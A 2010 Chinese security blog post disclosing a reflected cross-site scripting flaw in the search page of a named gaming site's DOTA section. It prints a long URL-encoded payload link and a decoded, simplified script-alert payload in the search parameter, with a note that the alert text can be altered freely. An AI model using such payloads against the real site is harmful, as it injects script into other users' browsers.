河北网络安全博客

河北博客是一个关注网络安全、网站设计、网站推广、网站优化SEO、网站建设的河北地方博客。

« 百度网盟推广合作申请审核通过!谷歌今日退出中国,域名跳转至http://www.google.com.hk/ »

2010-3-10 22:35:51

游九(U9)网DOTA专题站搜索页跨站漏洞

   刚才在群里看到一个朋友发来的链接http://dota.uuu9.com/Search.aspx?keyword=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%B8%D0%D0%BB%B4%BA%B8%E7%B8%F8%CE%D2%D5%E2%B4%CE%BB%FA%BB%E1%21%B8%D0%D0%BB%CB%F9%D3%D0%B1%BB%CE%D2%B2%D9%B5%C4%C8%CB%21%BB%B9%D2%AA%B8%D0%D0%BB%C9%E3%CF%F1%B4%F3%CA%A6%C4%FA%D0%D4%BF%DE%C1%CB%D6%AA%B5%C0%C4%FA%CE%AA%C1%CB%CA%C2%D2%B5%B6%F8%C8%C3%D7%D4%BC%BA%B1%E4%B3%C9%C1%CB%D1%F4%F0%F4%A3%A1%A1%A3%A1%A3%A1%A3%A1%A3%D4%DA%CA%C2%D2%B5%B4%F3%D5%B9%BA%EA%CD%BC%D6%AE%BC%C6%D7%A3%D4%B8%CE%D2%C3%C7%B5%C4%D7%E6%B9%FA%B7%B1%C8%D9%B2%FD%CA%A2%2C%BB%A5%C1%AA%CD%F8%D4%DA%B1%BB%D4%E3%CC%A3%D6%D0%CF%ED%CA%DC%B1%BB%D4%E3%CC%A3%B5%C4%BF%EC%B8%D0%21%21%D7%EE%BA%F3%BB%B6%D3%AD%C0%B4%B5%BD%CE%D2%B5%C4%B2%A9%BF%CD%3A%77%77%77%2E%75%66%6F%68%61%63%6B%65%72%2E%63%6E%22%29%3C%2F%73%63%72%69%70%74%3E
  打开后如下图
 


其实http://dota.uuu9.com/Search.aspx?keyword=后面的是url编码,反编译后可以得到
我来修改成自己的
http://dota.uuu9.com/Search.aspx?keyword=<script>alert("http://www.kingwq.cn")</script>
括号内容任意。

 



河北博客原创文章如转载,请注明:转载自kingwq河北网络安全博客 [ http://www.kingwq.cn/ ]

河北博客本文链接地址:http://www.kingwq.cn/article/BUG/20100310982/

发布:kingwq | 分类:漏洞公告 | 评论:0 | 引用:0 | 浏览:



发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅河北博客

河北博客站内搜索

河北博客相关链接

河北博客热文排行

最新评论及回复

最近发表

网站收藏

Powered By kingwq's blog

本站采用创作共用版权协议, 要求署名、非商业用途和保持一致. 转载本站内容必须也遵循“署名-非商业用途-保持一致”的创作共用协议.
This site is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 2.5 License.冀ICP备09002514号.Copyright www.kingwq.cn.2010